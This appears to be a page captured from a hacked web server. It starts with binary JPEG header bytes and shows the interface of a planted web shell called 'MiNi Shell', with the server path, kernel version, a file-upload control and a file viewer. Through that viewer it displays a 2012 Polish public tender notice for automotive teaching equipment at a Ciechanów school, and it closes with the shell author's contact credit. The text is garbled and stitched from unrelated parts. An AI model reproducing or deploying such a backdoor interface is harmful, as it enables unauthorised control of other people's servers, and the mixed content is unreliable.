JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121206/493140-N-2012.html

<p class="kh_header"><b>Ciechanów: Dostawa pomocy dydaktycznych na wyposażenie pracowni przedmiotów zawodowych</b><br>
<b>Numer ogłoszenia: 493140 - 2012; data zamieszczenia: 06.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Nr 3 im. Stanisława Staszica , ul. Stefana Okrzei 6, 06-400 Ciechanów, woj. mazowieckie, tel. 23 672-30-51, faks 23 672-30-51.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zs3.ciechanow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: owiatowa jednostka.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa pomocy dydaktycznych na wyposażenie pracowni przedmiotów zawodowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa pomocy dydaktycznych na wyposażenie pracowni przedmiotów zawodowych w Zespole Szkół nr 3 w Ciechanowie.
Zakres zamówienia obejmuje dostawę do siedziby Zamawiającego  następujących pomocy dydaktycznych:
1)	system diagnostyczny CDIF-2 kompletny z laptopem - 1 szt.
Zestaw   powinien zawierać:
- interfejs diagnostyczny
- oprogramowanie wraz z instrukcją na płycie CD
- standardowy kabel pomiarowo-sterujący
- kabel USB
- uniwersalny kabel FIAT
- przejściówka OBD2/VW
- adapter OPEL
- adapter BMW
- adapter DAEWOO
- adapter MERCEDES 38-pin
- adapter MERCEDES 14-pin
- adapter PSA 30-pin
- adapter RENAULT 12 pin
- adapter niebieski
- adapter czerwony
- przedłużka HDB 26-pin
- przejściówka OBD II 16-pin
- adapter J1962 OBD II
- moduł Wi-Fi
W ramach realizacji zamówienia Wykonawca zobowiązany jest zapewnić:
- nieodpłatne korzystanie przez Zamawiającego z licencji oprogramowania przez okres co najmniej 6 miesięcy ,  w tym co najmniej  trzech  aktualizacji oprogramowania.  
2)	urządzenie do kontroli geometrii ustawiania kół i osi pojazdów dla samochodów osobowych i dostawczych  - 1 szt. spełniający wymogi:
- zasilanie 200 - 240 V
- częstotliwość 50/60 Hz
- nośność płyt obrotowych każda 1200 kg
- zakres mocowania ramek 10 - 24 cali
- komputer PC, 
- kolorowy monitor 19 cali 
- klawiatura
- kolorowa drukarka atramentowa
- system operacyjny WINOWS
- program użytkownika z obszerną bazą danych regulacyjnych pojazdów dla  różnych regionów świata
- 4 uchwyty standardowe
- 4 uchwyty punktowe od 10 do 24 cali
- 4 głowice pomiarowe czujniki CCD - 8 sens.
- obrotnice mechaniczne EXCEL, wysokość 50 mm
- baza danych regulacyjnych samochodów
- blokada kierownicy
- blokada pedału hamulca
- montaż i szkolenie
3)	stanowisko testowania alternatorów  - 1 szt.
Spełniające parametry techniczne:
- zasilanie z jednofazowej sieci energetycznej 230V
- napęd: silnik indukcyjny asynchroniczny o mocy 2,2 kW poprzez falownik
- zabezpieczenie przeciążeniowe,
- zabezpieczenie wyłącznikiem różnicowoprądowym,
- awaryjny wyłącznik zasilania stanowiska,
- zakres płynnej zmiany obrotów napędu: 0 do 6000 obr./min.
- maksymalne obciążenie badanego alternatora : 150A regulowane skokowo w zakresach 10A,
- maksymalny prąd wzbudzenia z zewnętrznych regulatorów napięcia: 7A,
- cyfrowy pomiar następujących wartości:
-napięcie akumulatora,
-napięcie alternatora,
-prąd obciążenia alternatora,
-prąd wzbudzenia
4)	urządzenie do ustawiania i kontroli świateł oświetleniowych pojazdu (pozycjonowanie laserem)-   1 szt.
urządzenie winno być zbudowane z:
- głowicy wyposażonej w suwak
- wózka ze słupem
- projektora bazowania
5)	wózek narzędziowy - 2 szt.
Składający się z:
- 6 szuflad - rękojeść metalowa,
- blatu roboczego przykrytego zdejmowaną podkładką z tworzywa ABS,
- centralnego zamka,
- w zestawie 161 narzędzi modułowych
-	moduł nasadowy ? cala
-	moduł nasadowy ? cala
-	moduł 4 szczypiec: tnące, uniwersalne, do zdejmowania izolacji, półokrągłe proste,
-	wkładka z kompletem końcówek  do dokręcania -30 końcówek
-	moduł 6 wkrętaków
-	moduł 8 wkrętaków do śrub z rowkiem
-	moduł 8 kluczy trzpieniowych 6-kątnych z rękojeścią
-	moduł 16 kluczy oczkowo- płaskich
-	moduł narzędzi do pobijania (młotek, wbijaki, przecinak)
-	moduł 4 szczypiec do pierścieni  osadczych,
-	moduł 2 szczypiec - nastawne i  zaciskowe
-	moduł 4 kluczy oczkowo-płaskich, 
6)	tester akumulatora i alternatora wyposażony w drukarkę  - 1 szt.
Urządzenie winno spełniać wymagania:
-możliwość sprawdzenia kondycji samego akumulatora
- możliwość sprawdzenia alternatora
- możliwość sprawdzenia rozrusznika
- możliwość sprawdzenia spadków napięcia pod obciążeniem rozrusznika
- możliwość sprawdzenia wykorzystywanych podczas jazdy odbiorników (ogrzewanie szyby, światła itp.)
- wszystkie operacje jak i sam wydruk powinny być w języku polskim
7)	tester płynu hamulcowego (elektroniczny), pokazujący temperaturę wrzenia - 1 szt.
8)	tester płynu chłodniczego - 1 szt.
9)	podnośnik Żaba 3 tony - 1 szt.
10)	klucz udarowy ?  cala- 1 szt., spełniający wymagania:
- wykonany z materiałów kompozytowych i duraluminium
- masa 2kg
- system zmiany obrotów lewo-prawo
- mechanizm udarowy gwarantujący skuteczność odkręcania śrub przy stabilnej pracy
- końcówka trzpienia ? cala
- obroty 10.000 na minutę
11)	urządzenie do montażu i demontażu przegubu drążka wewnętrznego w układzie kierowniczym  - 1 szt., spełniający wymagania:
- średnica głowicy: 28-35 mm
- długość 400 mm
- zabierak ? cala lub klucz (plaski, płasko-oczkowy)
12)	zestaw do wkręcania tłoczków hamulcowych - 1 szt.
Zestaw   powinien zawierać:
- 16 adapterów
- śrubę z gwintem prawoskrętnym
- śrubę z gwintem lewoskrętnym
13)	zestaw ręcznych separatorów do zacisków hamulcowych - 1 szt.
Zestaw   powinien zawierać:
- 16 adapterów
- śrubę z gwintem prawoskrętnym
- śrubę z gwintem lewoskrętnym
14)	kątomierz klucza dynamometrycznego  ?  - 2 szt., spełniający wymagania:
- wykonany ze stali chromowo-wanadowej,
- skala 0-360 stopni,
- podziałka co 1 stopień,
15)	cyfrowy aparat dynamometryczny- 3/8  - 1 szt., spełniający wymagania:
- wykonany ze stali chromowo-wanadowej,
- skala 0-360 stopni,
- podziałka co 1 stopień.
W ramach realizacji zamówienia Wykonawca zobowiązany jest do:
1)	przeszkolenia w zakresie obsługi dostarczonych pomocy dydaktycznych, wskazanych przez Zamawiającego  pracowników Zespołu,
2)	Nieodpłatnej pomocy technicznej w okresie objętym okresem gwarancji.
3)	Załączenia do każdej z pomocy dydaktycznej -Instrukcji obsługi w języku polskim.
Okres gwarancji na dostarczony przedmiot zamówienia - min. 24 m-ce..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 39.16.21.10-9, 34.15.20.00-7, 33.12.41.10-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 27.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający na podstawie przedłożonych dokumentów i oświadczeń dokona oceny spełnienia warunku określonego w art.22 ust. 1 pkt 1 ustawy Prawo zamówień publicznych metodą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający na podstawie przedłożonych dokumentów i oświadczeń dokona oceny spełnienia warunku określonego w art.22 ust. 1 pkt 2 ustawy Prawo zamówień publicznych metodą spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zs3.ciechanow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Nr 3
im. Stanisława Staszica
ul. Okrzei 6
06-400 Ciechanów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.12.2012 godzina 09:00, miejsce: Zespół Szkół Nr 3
im. Stanisława Staszica
ul. Okrzei 6
06-400 Ciechanów
Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com